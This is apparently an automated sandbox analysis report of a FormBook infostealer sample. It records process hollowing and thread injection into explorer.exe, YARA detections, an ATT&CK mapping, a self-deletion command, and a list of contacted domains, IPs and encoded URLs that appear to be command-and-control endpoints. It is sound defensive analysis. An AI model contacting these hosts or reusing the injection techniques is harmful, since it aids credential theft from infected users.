          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]9_2_045A002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]9_2_045A002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]9_2_045A002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A002D mov eax, dword ptr fs:[00000030h]9_2_045A002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]9_2_0460B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov ecx, dword ptr fs:[00000030h]9_2_0460B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]9_2_0460B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]9_2_0460B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]9_2_0460B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460B8D0 mov eax, dword ptr fs:[00000030h]9_2_0460B8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]9_2_045740E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]9_2_045740E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045740E1 mov eax, dword ptr fs:[00000030h]9_2_045740E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045758EC mov eax, dword ptr fs:[00000030h]9_2_045758EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B8E4 mov eax, dword ptr fs:[00000030h]9_2_0459B8E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B8E4 mov eax, dword ptr fs:[00000030h]9_2_0459B8E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579080 mov eax, dword ptr fs:[00000030h]9_2_04579080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3884 mov eax, dword ptr fs:[00000030h]9_2_045F3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F3884 mov eax, dword ptr fs:[00000030h]9_2_045F3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov ecx, dword ptr fs:[00000030h]9_2_045AF0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov eax, dword ptr fs:[00000030h]9_2_045AF0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AF0BF mov eax, dword ptr fs:[00000030h]9_2_045AF0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045B90AF mov eax, dword ptr fs:[00000030h]9_2_045B90AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A20A0 mov eax, dword ptr fs:[00000030h]9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B944 mov eax, dword ptr fs:[00000030h]9_2_0459B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459B944 mov eax, dword ptr fs:[00000030h]9_2_0459B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457B171 mov eax, dword ptr fs:[00000030h]9_2_0457B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457B171 mov eax, dword ptr fs:[00000030h]9_2_0457B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0457C962 mov eax, dword ptr fs:[00000030h]9_2_0457C962
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]9_2_04579100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]9_2_04579100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04579100 mov eax, dword ptr fs:[00000030h]9_2_04579100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A513A mov eax, dword ptr fs:[00000030h]9_2_045A513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045A513A mov eax, dword ptr fs:[00000030h]9_2_045A513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_04594120 mov eax, dword ptr fs:[00000030h]9_2_04594120
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.128.40 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.growwithjenn.com
          Source: C:\Windows\explorer.exeDomain query: www.oilleakgames.com
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.goldgrandpa.com
          Source: C:\Windows\explorer.exeDomain query: www.bring-wellness.com
          Source: C:\Windows\explorer.exeDomain query: www.sw-advisers.com
          Source: C:\Windows\explorer.exeNetwork Connect: 165.22.38.5 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.goodlukc.com
          Source: C:\Windows\explorer.exeDomain query: www.freshdeliciousberryfarm.com
          Source: C:\Windows\explorer.exeDomain query: www.goldinsacks.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 157.245.232.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.2dmaxximumrecords.com
          Source: C:\Windows\explorer.exeDomain query: www.allyexpense.com
          Source: C:\Windows\explorer.exeDomain query: www.protectpursuit.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Users\user\Desktop\UGGJ4NnzFz.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: CA0000Jump to behavior
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeProcess created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.222167961.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.241512606.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.223815044.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000009.00000002.476895776.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B88

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 432566 Sample: UGGJ4NnzFz Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 31 www.topazsnacks.com 2->31 33 topazsnacks.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 11 UGGJ4NnzFz.exe 20 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 UGGJ4NnzFz.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 growwithjenn.com 160.153.136.3, 49749, 80 GODADDY-AMSDE United States 18->35 37 sw-advisers.com 157.245.232.77, 49743, 80 DIGITALOCEAN-ASNUS United States 18->37 39 16 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 cmmon32.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          UGGJ4NnzFz.exe29%VirustotalBrowse
          UGGJ4NnzFz.exe30%ReversingLabsWin32.Spyware.Noon
          UGGJ4NnzFz.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.UGGJ4NnzFz.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.1.UGGJ4NnzFz.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.UGGJ4NnzFz.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.UGGJ4NnzFz.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          9.2.cmmon32.exe.624368.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          9.2.cmmon32.exe.4a87960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.UGGJ4NnzFz.exe.2290000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.UGGJ4NnzFz.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          SourceDetectionScannerLabelLink
          protectpursuit.com4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.bring-wellness.com/dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ00%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.goldgrandpa.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&amp;rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkT0%Avira URL Cloudsafe
          www.rebeccannemontgomery.net/dp3a/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          protectpursuit.com
          		165.22.38.5
          		truetrueunknown
          bring-wellness.com
          		34.102.136.180
          		truefalse
            		unknown
            sw-advisers.com
            		157.245.232.77
            		truetrue
              		unknown
              www.goldinsacks.com
              		62.149.128.40
              		truetrue
                		unknown
                freshdeliciousberryfarm.com
                		34.102.136.180
                		truefalse
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truetrue
                    		unknown
                    growwithjenn.com
                    		160.153.136.3
                    		truetrue
                      		unknown
                      topazsnacks.com
                      		135.181.180.74
                      		truetrue
                        		unknown
                        www.growwithjenn.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.oilleakgames.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.goodlukc.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.freshdeliciousberryfarm.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.topazsnacks.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.goldgrandpa.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bring-wellness.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sw-advisers.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.2dmaxximumrecords.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.allyexpense.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.protectpursuit.com
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.bring-wellness.com/dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goldgrandpa.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrRtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goldinsacks.com/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvPtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              www.rebeccannemontgomery.net/dp3a/true
                                              • Avira URL Cloud: safe
                                              		low

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.tiro.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://nsis.sf.net/NSIS_ErrorErrorUGGJ4NnzFz.exefalse
                                                            		high
                                                            http://www.goodfont.co.krexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorUGGJ4NnzFz.exefalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    		high
